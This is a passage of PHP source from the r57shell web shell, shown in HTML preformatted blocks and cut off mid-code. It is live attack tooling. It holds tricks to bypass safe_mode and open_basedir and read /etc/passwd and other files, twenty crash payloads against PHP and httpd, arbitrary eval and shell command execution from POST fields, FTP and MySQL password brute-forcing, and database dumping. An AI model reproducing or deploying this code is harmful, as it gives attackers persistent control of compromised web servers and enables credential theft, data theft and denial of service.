<PRE>     @unlink($temp);                                                               </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test6':                                                                 </PRE>
<PRE>     $stream = @imap_open('/etc/passwd', "", "");                                  </PRE>
<PRE>     $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");             </PRE>
<PRE>     for ($i = 0; $i < count($dir_list); $i++) echo htmlspecialchars($dir_list[$i])."\r\n";</PRE>
<PRE>     @imap_close($stream);                                                         </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test7':                                                                 </PRE>
<PRE>     $stream = @imap_open($_POST['test7_file'], "", "");                           </PRE>
<PRE>     $str = @imap_body($stream, 1);                                                </PRE>
<PRE>     echo htmlspecialchars($str);                                                  </PRE>
<PRE>     @imap_close($stream);                                                         </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test8':                                                                 </PRE>
<PRE>     $temp=@tempnam($_POST['test8_file2'], "copytemp");                            </PRE>
<PRE>     $str = readzlib($_POST['test8_file1'],$temp);                                 </PRE>
<PRE>     echo htmlspecialchars($str);                                                  </PRE>
<PRE>     @unlink($temp);                                                               </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test9':                                                                 </PRE>
<PRE>     @ini_restore("safe_mode");                                                    </PRE>
<PRE>     @ini_restore("open_basedir");                                                 </PRE>
<PRE>     $str = moreread($_POST['test9_file']);                                        </PRE>
<PRE>     echo htmlspecialchars($str);                                                  </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test10':                                                                </PRE>
<PRE>     @ob_clean();                                                                  </PRE>
<PRE>     $error_reporting = @ini_get('error_reporting');                               </PRE>
<PRE>     error_reporting(E_ALL ^ E_NOTICE);                                            </PRE>
<PRE>     @ini_set("display_errors", 1);                                                </PRE>
<PRE>     $str=fopen($_POST['test10_file'],"r");                                        </PRE>
<PRE>     while(!feof($str)){print htmlspecialchars(fgets($str));}                      </PRE>
<PRE>     fclose($str);                                                                 </PRE>
<PRE>     error_reporting($error_reporting);                                            </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test11':                                                                </PRE>
<PRE>     @ob_clean();                                                                  </PRE>
<PRE>     $temp = 'zip://'.$_POST['test11_file'];                                       </PRE>
<PRE>     $str = moreread($temp);                                                       </PRE>
<PRE>     echo htmlspecialchars($str);                                                  </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test12':                                                                </PRE>
<PRE>     @ob_clean();                                                                  </PRE>
<PRE>     $temp = 'compress.bzip2://'.$_POST['test12_file'];                            </PRE>
<PRE>     $str = moreread($temp);                                                       </PRE>
<PRE>     echo htmlspecialchars($str);                                                  </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test13':                                                                </PRE>
<PRE>     @error_log($_POST['test13_file1'], 3, "php://../../../../../../../../../../../".$_POST['test13_file2']);</PRE>
<PRE>     echo $lang[$language.'_text61'];                                              </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test14':                                                                </PRE>
<PRE>     @session_save_path($_POST['test14_file2']."\0;/tmp");                         </PRE>
<PRE>     @session_start();                                                             </PRE>
<PRE>     @$_SESSION[php]=$_POST['test14_file1'];                                       </PRE>
<PRE>     echo $lang[$language.'_text61'];                                              </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test15':                                                                </PRE>
<PRE>                                                                                   </PRE>
<PRE>     @readfile($_POST['test15_file1'], 3, "php://../../../../../../../../../../../".$_POST['test15_file2']);</PRE>
<PRE>     echo $lang[$language.'_text61'];                                              </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test16':                                                                </PRE>
<PRE>     if (fopen('srpath://../../../../../../../../../../../'.$_POST['test16_file'],"a")) echo $lang[$language.'_text61'];</PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test17_1':                                                              </PRE>
<PRE>     @unlink('symlinkread');                                                       </PRE>
<PRE>     @symlink('a/a/a/a/a/a/', 'dummy');                                            </PRE>
<PRE>     @symlink('dummy/../../../../../../../../../../../'.$_POST['test17_file'], 'symlinkread');</PRE>
<PRE>     @unlink('dummy');                                                             </PRE>
<PRE>     while (1)                                                                     </PRE>
<PRE>      {                                                                            </PRE>
<PRE>       @symlink('.', 'dummy');                                                     </PRE>
<PRE>       @unlink('dummy');                                                           </PRE>
<PRE>      }                                                                            </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test17_2':                                                              </PRE>
<PRE>     $str='';                                                                      </PRE>
<PRE>     while (strlen($str) < 3) {                                                    </PRE>
<PRE>      $temp = 'symlinkread';                                                       </PRE>
<PRE>      $str = moreread($temp);                                                      </PRE>
<PRE>      if($str){ @ob_clean(); echo htmlspecialchars($str);}                         </PRE>
<PRE>     }                                                                             </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>     case 'test17_3':                                                              </PRE>
<PRE>     $dir = $files = array();                                                      </PRE>
<PRE>     if(@version_compare(@phpversion(),"5.0.0")>=0){                               </PRE>
<PRE>      while (@count($dir) < 3) {                                                   </PRE>
<PRE>       $dir=@scandir('symlinkread');                                               </PRE>
<PRE>       if (@count($dir) > 2) {@ob_clean(); @print_r($dir); }                       </PRE>
<PRE>      }                                                                            </PRE>
<PRE>     }                                                                             </PRE>
<PRE>     else {                                                                        </PRE>
<PRE>      while (@count($files) < 3) {                                                 </PRE>
<PRE>       $dh  = @opendir('symlinkread');                                             </PRE>
<PRE>       while (false !== ($filename = @readdir($dh))) {                             </PRE>
<PRE>        $files[] = $filename;                                                      </PRE>
<PRE>       }                                                                           </PRE>
<PRE>       if(@count($files) > 2){@ob_clean(); @print_r($files); }                     </PRE>
<PRE>      }                                                                            </PRE>
<PRE>     }                                                                             </PRE>
<PRE>     break;                                                                        </PRE>
<PRE>    }                                                                              </PRE>
<PRE>   }                                                                               </PRE>
<PRE>   if((!$safe_mode) && ($_POST['cmd']!="php_eval") && ($_POST['cmd']!="mysql_dump") && ($_POST['cmd']!="db_query") && ($_POST['cmd']!="ftp_brute") && ($_POST['cmd']!="db_brute")){</PRE>
<PRE>    $cmd_rep = ex($_POST['cmd']);                                                  </PRE>
<PRE>    if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }</PRE>
<PRE>    else { echo @htmlspecialchars($cmd_rep)."\n"; }}                               </PRE>
<PRE>                                                                                   </PRE>
<PRE>   switch($_POST['cmd'])                                                           </PRE>
<PRE>   {                                                                               </PRE>
<PRE>    case 'dos1':                                                                   </PRE>
<PRE>    function a() { a(); } a();                                                     </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos2':                                                                   </PRE>
<PRE>    @pack("d4294967297", 2);                                                       </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos3':                                                                   </PRE>
<PRE>    $a = "a";@unserialize(@str_replace('1', 2147483647, @serialize($a)));          </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos4':                                                                   </PRE>
<PRE>    $t = array(1);while (1) {$a[] = &$t;};                                         </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos5':                                                                   </PRE>
<PRE>    @dl("sqlite.so");$db = new SqliteDatabase("foo");                              </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos6':                                                                   </PRE>
<PRE>    preg_match('/(.(?!b))*/', @str_repeat("a", 10000));                            </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos7':                                                                   </PRE>
<PRE>    @str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538));             </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos8':                                                                   </PRE>
<PRE>    @shell_exec("killall -11 httpd");                                              </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos9':                                                                   </PRE>
<PRE>    function cx(){ @tempnam("/www/", "../../../../../../var/tmp/cx"); cx(); } cx();</PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos10':                                                                  </PRE>
<PRE>    $a = @str_repeat ("A",438013);$b = @str_repeat ("B",951140);@wordwrap ($a,0,$b,0);</PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos11':                                                                  </PRE>
<PRE>    @array_fill(1,123456789,"Infigo-IS");                                          </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos12':                                                                  </PRE>
<PRE>    @substr_compare("A","A",12345678);                                             </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos13':                                                                  </PRE>
<PRE>    @unserialize("a:2147483649:{");                                                </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos14':                                                                  </PRE>
<PRE>    $Data = @str_ireplace("\n", "<br>", $Data);                                    </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos15':                                                                  </PRE>
<PRE>    function toUTF($x) {return chr(($x >> 6) + 192) . chr(($x & 63) + 128);}       </PRE>
<PRE>    $str1 = "";for($i=0; $i < 64; $i++){ $str1 .= toUTF(977);}                     </PRE>
<PRE>    @htmlentities($str1, ENT_NOQUOTES, "UTF-8");                                   </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos16':                                                                  </PRE>
<PRE>    $r = @zip_open("x.zip");$e = @zip_read($r);$x = @zip_entry_open($r, $e);       </PRE>
<PRE>    for ($i=0; $i<1000; $i++) $arr[$i]=array(array(""));                           </PRE>
<PRE>    unset($arr[600]);@zip_entry_read($e, -1);unset($arr[601]);                     </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos17':                                                                  </PRE>
<PRE>    $z = "UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"; </PRE>
<PRE>    $y = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"; </PRE>
<PRE>    $x = "AQ                                                                        "; </PRE>
<PRE>    unset($z);unset($y);$x = base64_decode($x);$y = @sqlite_udf_decode_binary($x);unset($x);</PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos18':                                                                  </PRE>
<PRE>    $MSGKEY = 519052;$msg_id = @msg_get_queue ($MSGKEY, 0600);                     </PRE>
<PRE>    if (!@msg_send ($msg_id, 1, 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH', false, true, $msg_err)) </PRE>
<PRE>    echo "Msg not sent because $msg_err\n";                                        </PRE>
<PRE>    if (@msg_receive ($msg_id, 1, $msg_type, 0xffffffff, $_SESSION, false, 0, $msg_error)) { </PRE>
<PRE>    echo "$msg\n";                                                                 </PRE>
<PRE>    } else { echo "Received $msg_error fetching message\n"; break; }               </PRE>
<PRE>    @msg_remove_queue ($msg_id);                                                   </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos19':                                                                  </PRE>
<PRE>    $url = "php://filter/read=OFF_BY_ONE./resource=/etc/passwd"; @fopen($url, "r");</PRE>
<PRE>    break;                                                                         </PRE>
<PRE>    case 'dos20':                                                                  </PRE>
<PRE>    $hashtable = str_repeat("A", 39);                                              </PRE>
<PRE>    $hashtable[5*4+0]=chr(0x58);$hashtable[5*4+1]=chr(0x40);$hashtable[5*4+2]=chr(0x06);$hashtable[5*4+3]=chr(0x08);</PRE>
<PRE>    $hashtable[8*4+0]=chr(0x66);$hashtable[8*4+1]=chr(0x77);$hashtable[8*4+2]=chr(0x88);$hashtable[8*4+3]=chr(0x99);</PRE>
<PRE>    $str = 'a:100000:{s:8:"AAAABBBB";a:3:{s:12:"0123456789AA";a:1:{s:12:"AAAABBBBCCCC";i:0;}s:12:"012345678AAA";i:0;s:12:"012345678BAN";i:0;}';</PRE>
<PRE>    for ($i=0; $i<65535; $i++) { $str .= 'i:0;R:2;'; }                             </PRE>
<PRE>    $str .= 's:39:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:39:"'.$hashtable.'";i:0;R:3;';</PRE>
<PRE>    @unserialize($str);                                                            </PRE>
<PRE>    break;                                                                         </PRE>
<PRE>   }                                                                               </PRE>
<PRE>                                                                                   </PRE>
<PRE>   if ($_POST['cmd']=="php_eval"){                                                 </PRE>
<PRE>    $eval = @str_replace("<?","",$_POST['php_eval']);                              </PRE>
<PRE>    $eval = @str_replace("?>","",$eval);                                           </PRE>
<PRE>    @eval($eval);}                                                                 </PRE>
<PRE>                                                                                   </PRE>
<PRE>   if ($_POST['cmd']=="ftp_brute")                                                 </PRE>
<PRE>    {                                                                              </PRE>
<PRE>    $suc = 0;                                                                      </PRE>
<PRE>    if($_POST['brute_method']=='passwd'){                                          </PRE>
<PRE>    foreach($users as $user)                                                       </PRE>
<PRE>     {                                                                             </PRE>
<PRE>       $connection = @ftp_connect($ftp_server,$ftp_port,10);                       </PRE>
<PRE>       if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }</PRE>
<PRE>       else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } </PRE>
<PRE>       @ftp_close($connection);                                                    </PRE>
<PRE>     }                                                                             </PRE>
<PRE>    }else if(($_POST['brute_method']=='dic') && isset($_POST['ftp_login'])){       </PRE>
<PRE>     foreach($users as $user)                                                      </PRE>
<PRE>     {                                                                             </PRE>
<PRE>       $connection = @ftp_connect($ftp_server,$ftp_port,10);                       </PRE>
<PRE>       if(@ftp_login($connection,$_POST['ftp_login'],$user)) { echo "[+] ".$_POST['ftp_login'].":$user - success\r\n"; $suc++; }</PRE>
<PRE>       @ftp_close($connection);                                                    </PRE>
<PRE>     }                                                                             </PRE>
<PRE>    }                                                                              </PRE>
<PRE>    echo "\r\n-------------------------------------\r\n";                          </PRE>
<PRE>    $count = count($users);                                                        </PRE>
<PRE>    if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }</PRE>
<PRE>    echo $lang[$language.'_text97'].$count."\r\n";                                 </PRE>
<PRE>    echo $lang[$language.'_text98'].$suc."\r\n";                                   </PRE>
<PRE>    }                                                                              </PRE>
<PRE>                                                                                   </PRE>
<PRE>   if ($_POST['cmd']=="db_brute")                                                  </PRE>
<PRE>    {                                                                              </PRE>
<PRE>    $suc = 0;                                                                      </PRE>
<PRE>    if($_POST['brute_method']=='passwd'){                                          </PRE>
<PRE>    foreach($users as $user)                                                       </PRE>
<PRE>     {                                                                             </PRE>
<PRE>      $sql = new my_sql();                                                         </PRE>
<PRE>      $sql->db   = $_POST['db'];                                                   </PRE>
<PRE>      $sql->host = $_POST['db_server'];                                            </PRE>
<PRE>      $sql->port = $_POST['db_port'];                                              </PRE>
<PRE>      $sql->user = $user;                                                          </PRE>
<PRE>      $sql->pass = $user;                                                          </PRE>
<PRE>      if($sql->connect()) { echo "[+] $user:$user - success\r\n"; $suc++; }        </PRE>
<PRE>     }                                                                             </PRE>
<PRE>    if(isset($_POST['reverse']))                                                   </PRE>
<PRE>     {                                                                             </PRE>
<PRE>      foreach($users as $user)                                                     </PRE>
<PRE>       {                                                                           </PRE>
<PRE>        $sql = new my_sql();                                                       </PRE>
<PRE>        $sql->db   = $_POST['db'];                                                 </PRE>
<PRE>        $sql->host = $_POST['db_server'];                                          </PRE>
<PRE>        $sql->port = $_POST['db_port'];                                            </PRE>
<PRE>        $sql->user = $user;                                                        </PRE>
<PRE>        $sql->pass = strrev($user);                                                </PRE>
<PRE>        if($sql->connect()) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; }</PRE>
<PRE>       }                                                                           </PRE>
<PRE>     }                                                                             </PRE>
<PRE>    }else if(($_POST['brute_method']=='dic') && isset($_POST['mysql_l'])){         </PRE>
<PRE>     foreach($users as $user)                                                      </PRE>
<PRE>     {                                                                             </PRE>
<PRE>      $sql = new my_sql();                                                         </PRE>
<PRE>      $sql->db   = $_POST['db'];                                                   </PRE>
<PRE>      $sql->host = $_POST['db_server'];                                            </PRE>
<PRE>      $sql->port = $_POST['db_port'];                                              </PRE>
<PRE>      $sql->user = $_POST['mysql_l'];                                              </PRE>
<PRE>      $sql->pass = $user;                                                          </PRE>
<PRE>      if($sql->connect()) { echo "[+] ".$_POST['mysql_l'].":$user - success\r\n"; $suc++; }</PRE>
<PRE>     }                                                                             </PRE>
<PRE>    }                                                                              </PRE>
<PRE>    echo "\r\n-------------------------------------\r\n";                          </PRE>
<PRE>    $count = count($users);                                                        </PRE>
<PRE>    if(isset($_POST['reverse']) && ($_POST['brute_method']=='passwd')) { $count *= 2; }</PRE>
<PRE>    echo $lang[$language.'_text97'].$count."\r\n";                                 </PRE>
<PRE>    echo $lang[$language.'_text98'].$suc."\r\n";                                   </PRE>
<PRE>    }                                                                              </PRE>
<PRE>                                                                                   </PRE>
<PRE>   if ($_POST['cmd']=="mysql_dump")                                                </PRE>
<PRE>    {                                                                              </PRE>
<PRE>     if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }           </PRE>
<PRE>     $sql = new my_sql();                                                          </PRE>
<PRE>     $sql->db   = $_POST['db'];                                                    </PRE>
<PRE>     $sql->host = $_POST['db_server'];                                             </PRE>
<PRE>     $sql->port = $_POST['db_port'];                                               </PRE>
<PRE>     $sql->user = $_POST['mysql_l'];                                               </PRE>
<PRE>     $sql->pass = $_POST['mysql_p'];                                               </PRE>
<PRE>     $sql->base = $_POST['mysql_db'];                                              </PRE>
<PRE>     if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }       </PRE>
<PRE>     else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }      </PRE>
<PRE>     else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }</PRE>
<PRE>     else {                                                                        </PRE>
<PRE>      if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }       </PRE>
<PRE>      else if($fp || @function_exists('file_put_contents')){ foreach($sql->dump as $v){ @fwrite($fp,$v."\r\n") or @fputs($fp,$v."\r\n") or @file_put_contents($_POST['dif_name'],$v."\r\n");} } </PRE>
<PRE>      else { echo "[-] ERROR! Can't write in dump file"; }                         </PRE>
<PRE>      }                                                                            </PRE>
<PRE>    }                                                                              </PRE>
<PRE>                                                                                   </PRE>
<PRE>   echo "
";                                                       

   echo "";                                                                    
   echo "";                                                      
   echo "";                                                                                                             
   function div_title($title, $id)                                                 
   {                                                                               
     return ''.$title.'';
   }                                                                               
   function div($id)                                                               
    {                                                                              
    if(isset($_COOKIE[$id]) && ($_COOKIE[$id]==0)) return ''; 
    $divid=array('id5','id6','id8','id9','id10','id11','id16','id24','id25','id26','id27','id28','id29','id33','id34','id35','id37','id38');
    if(empty($_COOKIE[$id]) && @in_array($id,$divid)) return ''; 
    return '';                                                   
    }                                                                              
                                                                                   
   if(!$safe_mode){                                                                
   echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
   echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','cmd',85,''));
   echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
   else{                                                                           
   echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
   echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
   echo sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
   echo $te.''.$table_end1.$fe;                                              
                                                                                   
   if($safe_mode || $open_basedir){                                                
   echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
   echo sr(15,"".$lang[$language.'_text58'].$arrow."",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."".ws(3)."".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if($unix && @function_exists('touch')){                                         
   echo $fs.$table_up1.div_title($lang[$language.'_text128'],'id5').$table_up2.div('id5').$ts;
   echo sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','file_name',40,(!empty($_POST['file_name'])?($_POST['file_name']):($dir."/r57shell.php")))
   .ws(4)."".$lang[$language.'_text26'].ws(2).$lang[$language.'_text59'].$arrow.""
   .ws(2).in('text','file_name_r',40,(!empty($_POST['file_name_r'])?($_POST['file_name_r']):(""))));
   echo sr(15," or set  Day".$arrow."",                                     
   '                                                                               
   '                                                                      
   .ws(4)."Month".$arrow.""                                                 
   .'                                                                              
   '                                                                      
   .ws(4)."Year".$arrow.""                                                  
   .'                                                                              
   '                                                                      
   .ws(4)."Hour".$arrow.""                                                  
   .'                                                                              
   '                                                                      
   .ws(4)."Minute".$arrow.""                                                
   .'                                                                              
   '                                                                      
   .ws(4)."Second".$arrow.""                                                
   .'                                                                              
   '                                                                      
   .in('hidden','cmd',0,'touch')                                                   
   .in('hidden','dir',0,$dir)                                                      
   .ws(4).in('submit','submit',0,$lang[$language.'_butt1']));                      
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   $select='';                                                                     
   if(@function_exists('chmod')){$select .= "";}   
   if(@function_exists('chown')){$select .= "";}   
   if(@function_exists('chgrp')){$select .= "";}   
   if($unix && $select){                                                           
   echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
   echo @sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($dir."/r57shell.php"))).ws(2)."".$lang[$language.'_text68'].$arrow.""."".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));  
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(!$safe_mode){                                                                
   $aliases2 = '';                                                                 
   foreach ($aliases as $alias_name=>$alias_cmd)                                   
    {                                                                              
    $aliases2 .= "";                                   
    }                                                                              
   echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
   echo sr(15,"".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."","".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
   echo sr(15,"".$lang[$language.'_text52'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
   echo sr(15,"".$lang[$language.'_text53'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
   echo sr(15,"".$lang[$language.'_text55'].$arrow."",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
   echo $te.''.$table_end1.$fe;                                              
                                                                                   
   if(!$safe_mode && $unix){                                                       
   echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
   echo sr(15,"".$lang[$language.'_text72'].$arrow."",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
   echo sr(15,"".$lang[$language.'_text73'].$arrow."",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
   echo sr(15,"".$lang[$language.'_text74'].$arrow."",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
   echo "".div('id10')."";</PRE>
<PRE>   echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));</PRE>
<PRE>   echo "";                                                             
   echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');                 
   echo "
".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);            
   echo "";                                                     
   echo $table_end1.$fe;                                                           
                                                                                   
   if($safe_mode || $open_basedir)                                                 
   {                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
   echo "













































































































";                               echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(),"5.2.0")<=0)
   {                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
   echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && $mysql_on)                                  
   {                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
   echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
   echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && $mssql_on)                                  
   {                                                                               
   echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
   echo sr(15,"".$lang[$language.'_text36'].$arrow."",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."".$lang[$language.'_text37'].$arrow."".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."".$lang[$language.'_text38'].$arrow."".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."".$lang[$language.'_text14'].$arrow."".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
   echo sr(15,"".$lang[$language.'_text3'].$arrow."",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(),"5.2.0")<=0){
   echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
   echo sr(15,"".$lang[$language.'_text30'].$arrow."",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(),"5.2.0")<=0){
   echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
   echo sr(15,"".$lang[$language.'_text4'].$arrow."",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
   echo $te.''.$table_end1.$fe;                                              
   }                                                                               
                                                                                   
   if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(),"5.2.0")<=0){
   echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
